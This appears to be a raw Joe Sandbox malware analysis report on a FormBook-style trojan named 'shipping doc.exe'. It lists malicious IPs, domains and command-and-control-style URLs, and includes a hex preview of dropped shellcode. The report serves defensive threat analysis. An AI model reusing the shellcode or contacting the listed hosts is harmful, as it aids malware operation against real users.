                                                                                            http://anglebug.com/3452http://anglebug.com/5375chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://schemas.microexplorer.exe, 00000002.00000000.1815983467.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1819547244.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1817375605.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.hjgd.xyz/ba94/www.naservus.comexplorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            45.43.211.76
                                                                                            www.creditscorewizards.comUnited States
                                                                                            46261QUICKPACKETUStrue
                                                                                            87.236.19.19
                                                                                            www.prismotrov.comRussian Federation
                                                                                            198610BEGET-ASRUtrue
                                                                                            81.88.63.46
                                                                                            www.spesandosupermercato.comItaly
                                                                                            39729REGISTER-ASITtrue
                                                                                            91.195.240.19
                                                                                            parkingpage.namecheap.comGermany
                                                                                            47846SEDO-ASDEfalse
                                                                                            199.59.243.225
                                                                                            94950.bodis.comUnited States
                                                                                            395082BODIS-NJUSfalse
                                                                                            91.195.240.117
                                                                                            www.whatpixels.comGermany
                                                                                            47846SEDO-ASDEtrue
                                                                                            239.255.255.250
                                                                                            unknownReserved
                                                                                            unknownunknownfalse
                                                                                            185.215.4.42
                                                                                            www.reddragondao.comDenmark
                                                                                            50129TVHORADADAEStrue
                                                                                            172.217.165.132
                                                                                            www.google.comUnited States
                                                                                            15169GOOGLEUSfalse
                                                                                            199.15.163.139
                                                                                            www.galaxyprofituk.comUnited States
                                                                                            14238INNOVATIVE-NETWORKSUStrue
                                                                                            81.19.154.98
                                                                                            www.naservus.comAustria
                                                                                            38955WORLD4YOUATtrue
                                                                                            185.199.110.153
                                                                                            webdevmcfarland.github.ioNetherlands
                                                                                            54113FASTLYUStrue
                                                                                            IP
                                                                                            192.168.2.16
                                                                                            192.168.2.4
                                                                                            192.168.2.12
                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                            Analysis ID:1435937
                                                                                            Start date and time:2024-05-03 13:12:08 +02:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 15m 23s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:12
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:7
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Sample name:shipping doc.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.evad.winEXE@23/5@29/15
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 99%
                                                                                            • Number of executed functions: 49
                                                                                            • Number of non-executed functions: 296
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                            • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.42.65.92, 142.251.167.84, 142.251.40.206, 142.250.80.99, 34.104.35.123, 142.250.65.163, 142.250.65.206
                                                                                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, self.events.data.microsoft.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, clients2.google.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            TimeTypeDescription
                                                                                            13:14:00API Interceptor19688526x Sleep call for process: explorer.exe modified
                                                                                            13:14:03API Interceptor16621495x Sleep call for process: help.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            81.88.63.46160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.scwspark.com/9pdo/
                                                                                            2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.scwspark.com/9pdo/
                                                                                            202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.scwspark.com/9pdo/
                                                                                            Ordin de plat#U0103.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.shopivaina.com/q0kk/
                                                                                            zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.scwspark.com/9pdo/
                                                                                            CDXkaVYU19.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.442securitysolutions.com/hiba/?z4=ZR-xnPm&u84X=KqW5MlAbQTIxRvqWDRwizYQGpOQog21qPF7cZnovMwcuIcG77M91zj5jIa3lmKU11wbm
                                                                                            Mikbin.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.rezeromanga.net/da5x/?QpEpWh68=PRYnh4ChujHfOv/v1ImYP56t3jkOhrgvuW8wrmaeUKvhgd1oHNRI8guEejS4OwPq+XRu&x6kH=Xl_h-TZ09
                                                                                            PO9887655.exeGet hashmaliciousOsiris FormBookBrowse
                                                                                            • www.progettogreenitaly.com/cia6/?V6z=GyAQ/QjG25ce8mpx63vVFRR+RRJhWsHNSiMpkgdlJYftbyFXG155B0CZ5BRE5oT7Bjk6&aHbhuX=-ZcPpbOxm
                                                                                            data sheets.exeGet hashmaliciousOsiris FormBookBrowse
                                                                                            • www.progettogreenitaly.com/cia6/?4h=5jvxG4oH76BTSrx&ldDL=GyAQ/QjG25ce8mpx63vVFRR+RRJhWsHNSiMpkgdlJYftbyFXG155B0CZ5BRumYj7Fhs6
                                                                                            New order.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.easystay5terreluxury.com/zu8g/?xHbX=+2nVaCUX5DDe1MZ/anXMOitomnhhWtyFb1t1FLu1KjZEmbGVZ8ag3XjxT2cpHyhgco6x&xVvT=UHA4vNr8U0bL
                                                                                            91.195.240.19PAYROLL.docGet hashmaliciousFormBookBrowse
                                                                                            • www.ronalpola.shop/ro6r/?WnF4=YlbDSxW&dJqp=il5wTcNiOiNb9QAu5NYXY4JTbtpz/39r//GJjm4KbEU1DRsLojhaEkS+MaAGx4Z9TnIx95FB+Yzc77LGaHhmiuqQyTcpPEs2SAfFJPsrS1DL3WLKrmZhgvBFDYtn
                                                                                            Purchase Order For Consumables Eltra 008363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.adptgn.com/se63/?ehr=B/S030DRfbGC/Zs8m6u79oQd9S8Dl4En3dHvcSRMsHDWRaplPHiZfhINSWyXxORHgZbapwifUw==&pRxXAB=mnRtohcx_FWp
                                                                                            RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.luckydomainz.shop/gzu1/
                                                                                            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                                            • www.primeplay88.org/ufuh/
                                                                                            yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.dk48.lol/0hhg/
                                                                                            00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.tondex.finance/s8o3/
                                                                                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.solesense.pro/aleu/
                                                                                            SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.luckydomainz.shop/wu8v/
                                                                                            PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.solesense.pro/aleu/
                                                                                            DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.safeguardyourhouse.com/34ev/
                                                                                            199.59.243.225Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • www.versegenai.com/udud/
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.7200.9677.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • www.gaglianoart.com/tkc9/
                                                                                            http://199.59.243.225Get hashmaliciousUnknownBrowse
                                                                                            • 199.59.243.225/
                                                                                            Purchase Order For Consumables Eltra 118363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.tipsde.shop/se63/?J6Ahc=dewIrIU9TYNUg4ZC5pTO1rDtluGiKvvk19cnZPvSiT6F+2e/8aFD4mgucwEFUgn+tE98&CL=9rU0Qt
                                                                                            http://free.filesearch.club/?q=grade+9+core+french+textbookGet hashmaliciousUnknownBrowse
                                                                                            • ww25.hotpubs.co/favicon.ico
                                                                                            http://survey-smiles.comGet hashmaliciousUnknownBrowse
                                                                                            • survey-smiles.com/_tr
                                                                                            http://learningstudio.aiGet hashmaliciousUnknownBrowse
                                                                                            • ww25.learningstudio.ai/_fd?subid1=20240425-0142-37b3-9111-d85409cc0575
                                                                                            scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ww1.updatea1.com/
                                                                                            http://generali-siegburg.deGet hashmaliciousUnknownBrowse
                                                                                            • www4.generali-siegburg.de/_tr
                                                                                            UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.cardingforum.co/fs83/?K6kd=ktiB5k34S7XMxMtG4ygLbufVj40LypDdvl3wJXHrZvrRBL0QEfgJEgWVtFx4HUYX0Q4ZyTmo/Q==&uTrL=_bj8lfEpU
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            parkingpage.namecheap.comPAYROLL.docGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            Purchase Order For Consumables Eltra 008363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 91.195.240.19
                                                                                            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 91.195.240.19
                                                                                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 91.195.240.19
                                                                                            SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 91.195.240.19
                                                                                            94950.bodis.comUdskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 199.59.243.225
                                                                                            Purchase Order For Consumables Eltra 118363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                                                                            • 199.59.243.225
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            SEDO-ASDEPAYROLL.docGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            Purchase Order For Consumables Eltra 008363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 91.195.240.19
                                                                                            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 91.195.240.19
                                                                                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 91.195.240.19
                                                                                            SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                            • 91.195.240.19
                                                                                            confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 91.195.240.123
                                                                                            BEGET-ASRUtZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                            • 45.130.41.108
                                                                                            VOrqSh1Fts.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                                                                                            • 45.130.41.108
                                                                                            WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                                                            • 45.130.41.108
                                                                                            file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                            • 45.130.41.108
                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                            • 45.130.41.108
                                                                                            file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                            • 45.130.41.108
                                                                                            w0rLhtV1ui.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                            • 45.130.41.108
                                                                                            Mp7cjtN6To.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                            • 45.130.41.108
                                                                                            tmgF4oswp3fH2HU.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 87.236.16.235
                                                                                            file.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                            • 45.130.41.108
                                                                                            REGISTER-ASIT150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                                                            • 195.110.124.133
                                                                                            SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                            • 195.110.124.133
                                                                                            DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                            • 195.110.124.133
                                                                                            DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                            • 195.110.124.133
                                                                                            160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 81.88.63.46
                                                                                            2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 81.88.63.46
                                                                                            202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 81.88.63.46
                                                                                            Ordin de plat#U0103.exeGet hashmaliciousFormBookBrowse
                                                                                            • 81.88.63.46
                                                                                            zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 81.88.63.46
                                                                                            mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                                            • 195.110.124.188
                                                                                            QUICKPACKETUSXMsAx1W894.elfGet hashmaliciousMiraiBrowse
                                                                                            • 80.86.18.218
                                                                                            0tfJECfbEP.elfGet hashmaliciousMiraiBrowse
                                                                                            • 107.161.124.106
                                                                                            BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                            • 185.215.167.200
                                                                                            wsskM49eA3.elfGet hashmaliciousUnknownBrowse
                                                                                            • 185.216.201.241
                                                                                            SecuriteInfo.com.Variant.Midie.144704.8660.31773.exeGet hashmaliciousUnknownBrowse
                                                                                            • 66.78.40.230
                                                                                            ublk9YX19v.exeGet hashmaliciousAsyncRATBrowse
                                                                                            • 173.211.46.114
                                                                                            https://reyes1536.softr.app/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                            • 172.82.129.154
                                                                                            GhazisMyotonia.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                            • 45.61.141.168
                                                                                            Update.jsGet hashmaliciousSocGholishBrowse
                                                                                            • 193.26.115.181
                                                                                            https://emailmarketing.locaweb.com.br/accounts/188358/messages/27/clicks/25261/45?envelope_id=24Get hashmaliciousUnknownBrowse
                                                                                            • 185.245.180.201
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            28a2c9bd18a11de089ef85a160da29e4Eurovisioner.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            Documents for shipping PI BL PL.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            grfi013Jgr.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            http://verification.industriemaschinevertrieb.topGet hashmaliciousUnknownBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            SecuriteInfo.com.Win32.Evo-gen.10779.4942.dllGet hashmaliciousUnknownBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            https://down2earthincs.us17.list-manage.com/track/click?u=a6722c149df2e70d2e90b77d5&id=0c16d919d5&e=627038960f//#/?//bWlyZWxhLnB1cmNhcmVhQG90Yy5nb3YudWs=Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            Payment Reciept.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            worldbank purchase order_May.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            transferencia_97564432567897895645645678697564542356475869076543256789.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 40.68.123.157
                                                                                            • 23.51.58.94
                                                                                            a0e9f5d64349fb13191bc781f81f42e1citat #05022024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 104.46.162.224
                                                                                            Pedido-Faturado-398731.msiGet hashmaliciousUnknownBrowse
                                                                                            • 104.46.162.224
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.46.162.224
                                                                                            SecuriteInfo.com.Win32.PWSX-gen.11739.16980.exeGet hashmaliciousRisePro StealerBrowse
                                                                                            • 104.46.162.224
                                                                                            SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.46.162.224
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.46.162.224
                                                                                            file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                            • 104.46.162.224
                                                                                            2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                                                                            • 104.46.162.224
                                                                                            Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                            • 104.46.162.224
                                                                                            PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                            • 104.46.162.224
                                                                                            No context
                                                                                            Process:C:\Windows\explorer.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1019
                                                                                            Entropy (8bit):5.236946495216897
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
                                                                                            MD5:5D20D9B3F928AC964E07C561FD8A3F42
                                                                                            SHA1:B702BE149FCF94831A975F2CD06B2DFE020D9632
                                                                                            SHA-256:59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
                                                                                            SHA-512:30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
                                                                                            Malicious:false
                                                                                            Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr
                                                                                            Process:C:\Users\user\Desktop\shipping doc.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186054
                                                                                            Entropy (8bit):7.979445243189482
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:su0B/1BNwLXKlJl3g2jL9JYFGz/b+Kw9tJTaHUg1fkQbrn2SNbI3lwJpm5sxB6LM:aBNiXKlJW2v96F0jOuUfnYpmkDxHPJwe
                                                                                            MD5:DA5B2F40590E0145FBFC20C0442BFC96
                                                                                            SHA1:096EE2DB8CBF388EFCA1FBE1FA2955A5E0136B9A
                                                                                            SHA-256:38BFCBA3B2A9856939A2CD5FEAF394F1409D4E20BC1CB3DF4B6E2FCAC269E6CC
                                                                                            SHA-512:80089280CDBFBAFEE91EC4A3150F8E79F9E949CD5B4841187F0B70F92AF7987B8D4C17B3DB563763F8E6A8BAA84BC19C8CF3890297F44B9A8AB78A74CF258348
                                                                                            Malicious:false
                                                                                            Preview:EA06......!....X........^9...Su..i[..bgU..i.Z.B.A.R(.:|.9..fT*4..6a...]3.Z...8...s..D.5.\.%8...I..&.O.R.M&...x.r.b._cq9.bE=........rz..g......Z......T\....|v.=..s...8.-./M....$.U.{@!.;.BoF.Q..\......Nk0..ft).W.D...#iB..(......l\.z...G..*4.8..P...q.....lP..-..(..d`.l..3...b...........=.u .....fR.......X.6.l.:}`...N..............p......\.o..{.l.;+..o..Ic...-.P..]..G.q..=.N.n.n`..~..p.q.P...O.....J_.?5.v's..7.b.l....b....5....SL.af.;L......?.~.M.ai...G:..q".O.S.+...._..Z.ki...#...Q(.]...Z...e'.8..:.=....V:.}..wC.c../....9.e....h.ty......6s.$.......t....v........x...6...T?.k.6.q...eB....8.]..U9.`...G.E..L)..lz....91....N.T......=.P....gYV......GT.......}../T....M.R?.Z......{.......g8.?N.8..2..m[.C..p...2'N..;.'.QN.p-u=.Z..Q..?...M.x...|....u[.$.......j-\.@(.....Q.]....;s......n....c;.O...O.r........N/K..$.>T/qu..-..E.c...1.}..N..h[8.....&..=.W..mh.-?f...w:xG7u...`\].R...]kG..a.o!.......s........D8.Z..1.rq.|E.....9....U.Pxq}...Q.H .ZW6.L
                                                                                            Process:C:\Users\user\Desktop\shipping doc.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9932
                                                                                            Entropy (8bit):7.594748772581493
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:m+cK6f01Ehm0qek9Gh0qWbK3072+DKIw8r+YQsKvtOATwSlF:976Mkm7ek9y0pbK3079ujFYQsKvt7r
                                                                                            MD5:D1ACA4AA11CA9CEF21B6CA7BBD5A26DE
                                                                                            SHA1:D16211F750638980ACC9C15A423086A0365F9040
                                                                                            SHA-256:AAF6B7480C606FFF11905F4EA7CBA8C177A28F4E2F0AE0095BCFCA84A4D5C257
                                                                                            SHA-512:B0AA6EEC00018E592B0F8526E095DF19573BE7998B0CB6415A825C0B9EBCA4D6FAF89374E627FF31B6C07C40F194BEC3D0A4AC61825152F710643785F481C9F7
                                                                                            Malicious:false
                                                                                            Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                                                            Process:C:\Users\user\Desktop\shipping doc.exe
                                                                                            File Type:ASCII text, with very long lines (29744), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29744
                                                                                            Entropy (8bit):3.5478993302310977
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbQE+I+h6584vfF3if6gR:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RY
                                                                                            MD5:DD2C04ECADC5054DECF7213652C4F418
                                                                                            SHA1:94FB0996DFEEDA19537D6C67706D2EA9472A0150
                                                                                            SHA-256:54DE8FC31A19BAEF7B534A45D059E5F940A981B3733216F57102A953C5C5902D
                                                                                            SHA-512:072DEF6AFE8B38580F168A26FE1619BD3D8FF128F40E8B1917562171B7F7A6788A6A93682A5BE4046C3A68B6EE19B87DAA6C6E71815ADBD1DB672E3C8FCD6899
                                                                                            Malicious:false
                                                                                            Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066
                                                                                            Process:C:\Users\user\Desktop\shipping doc.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):189440
                                                                                            Entropy (8bit):7.874727356397738
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:keJFmGgYdIcVgF3G7CidSmlqlHrPslkssljuIEyIxyMh/GZ77pcGnKh:1JEGEGgJGnSJlHGkn5H+U/ch
                                                                                            MD5:04F11F3E1538CB79F21D7090D6EDB87E
                                                                                            SHA1:F22739707BEB6B45935E9AA969DBC0F1DC06EA04
                                                                                            SHA-256:2893E9F23792C7F623F9617D4E6686A21A9B8D8F1F34B4A6AB45A9FF74522A1F
